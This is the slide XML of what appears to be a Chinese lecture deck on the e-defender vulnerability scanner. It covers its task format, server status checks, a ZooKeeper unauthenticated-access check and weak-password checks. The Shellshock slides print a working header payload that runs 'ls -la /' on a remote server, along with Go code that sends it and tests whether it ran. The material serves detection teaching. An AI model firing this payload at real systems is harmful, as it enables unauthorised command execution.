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73" r:id="rId9"/>
    <p:sldId id="274" r:id="rId10"/>
    <p:sldId id="275" r:id="rId11"/>
    <p:sldId id="278" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="269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2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3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43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5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39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09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69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0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7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97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1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02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3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06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41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86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phaha/eDefender" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bilibili.com/read/cv282455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93FDC6-97D6-CE43-96AC-5D3DE20612EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3883069" y="1828800"/>
            <a:ext cx="4425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/>
              <a:t>e-defender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3434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AF44-853D-4146-B6BC-091D56BE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4" y="192633"/>
            <a:ext cx="9545458" cy="684190"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞检查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99F901-89C4-7446-8FDA-AEA32C01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4" y="912993"/>
            <a:ext cx="8693929" cy="5752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639A6E-B4E5-644C-BA9C-2100BB3A470F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9118948" y="1402914"/>
            <a:ext cx="274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Type</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是指请求的类型，如果是网页类型的选择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，如果是测试的服务器端口，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>service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netloc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是需要检查的接口，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>meta</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一些额外字段，像弱密码检查的功能需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>passlist</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中加入需要测试的密码组</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312589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DAE31-9B9A-4D48-A178-8C028478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9482828" cy="596508"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器状态检测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71556-3FB1-E446-9482-B34503D1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1" y="1215026"/>
            <a:ext cx="7262829" cy="57883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54DF72-F894-6541-9676-B018DD9F3455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678455" y="1390389"/>
            <a:ext cx="41085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调用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>接口发送</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>请求，可以查看服务器的内存使用情况，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>占用率，以及服务器信息，如果服务器有突发性的内存上涨或者占用率过高，可通过此接口来判断</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397282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2C099-DF49-D845-A9B2-5BCBCD41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核心模块精讲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168800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D45B8-AA01-AD47-9029-FB3A2B8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39" y="275572"/>
            <a:ext cx="9862785" cy="686518"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Zk</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>弱密码检测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A29637-D4BD-5345-ACE1-2F0FACF550A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415441" y="1816274"/>
            <a:ext cx="9862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func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> (d *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zookeeperUnauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>) Check(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> string, meta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>plugin.TaskMeta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>) bool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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, err := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>util.TCPSend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, []byte("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>envi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>"),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if err == nil &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strings.Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(string(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>), "Environment") {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>      result := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>d.info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result.Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fmt.Sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>("zookeeper://%s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netloc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result.Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> = string(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>buf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result.Remarks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fmt.Sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>未授权访问，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>result.Remarks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d.result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> = append(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>d.result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, result)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d.result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return true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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>   return false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99DB9-4634-1E48-B326-5CF4257E6E24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164921" y="1252603"/>
            <a:ext cx="998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弱密码检测就是想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服务器发送一些默认的密码，如果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有了响应，那么就可以判定改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服务器存在弱密码泄露现象</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260502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DE4A-EECC-1A4A-85F2-A2490DC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696716"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破壳检测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84524-DB0D-144A-8471-B96E4A90F314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="1315234"/>
            <a:ext cx="9745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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日，一位名叫斯特凡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>沙泽拉的安全研究者发现了一个名为“破壳”（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>也称为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>门”或“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞”）的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞。该漏洞如果被渗透，远程攻击者就可以在调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>前通过在特别精心编制的环境中输出函数定义执行任何程序代码。然后，这些函数内的代码就可以在调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>时立即执行。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46D8D-F7C3-0D47-86D4-39F94A85EFEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="3594970"/>
            <a:ext cx="9745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来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>CVSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的评分：破壳漏洞的严重性被定义为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>级（最高），今年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>月爆发的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>OpenSSL“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>心脏出血”漏洞才</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>级！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>破壳漏洞存在有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>年，和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>年龄一样。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403049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877A-22AC-EC40-A0A9-2F550024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9307463" cy="809450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破壳漏洞检测思路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F77767-A903-884B-9C15-F1309F8D0B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413359" y="809450"/>
            <a:ext cx="11448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通过网站</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>www.seebug.org</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>vuldb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/ssvid-88877</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提供的破壳漏洞检测代码，我们使用想远程的地址发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>() { :;};echo ; echo; echo $(/bin/ls -la /);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，然后检查响应体，通过检查响应体中是否有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>权限来判断是否能获取权限，虽然漏洞非常危险，但是检测起来思路还是比较明晰，实现代码如下：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8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66787B-38C1-3D45-BFE8-D65BFE28839F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2446751" y="0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 err="1"/>
              <a:t>pocList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> := []</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>{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6A8759"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"() { :;};echo ; echo; echo $(/bin/ls -la /);"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}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C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>_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 := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>pocList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   request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err := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AFBF7E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http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NewRequest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"GET"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checkURL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C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nil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"cookie"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"User-Agent"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"Referrer"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resp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err := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AFBF7E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>util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RequestDo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(request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C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true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897BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15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C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>err != </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>{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>
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return false</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}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C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AFBF7E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strings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Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>resp.ResponseRaw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 err="1">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
              </a:rPr>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-x"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AFBF7E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strings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Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>resp.ResponseRaw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 err="1">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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/>
              <a:t>) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>      result := 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.info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/>
              <a:t>result.Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>resp.ResponseRaw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/>
              <a:t>result.Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>resp.RequestRaw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.result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(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.result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result)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>
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return true</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7773E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="e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3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DE4A-EECC-1A4A-85F2-A2490DC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696716"/>
          </a:xfrm>
        </p:spPr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dav</a:t>
            </a:r>
            <a:r>
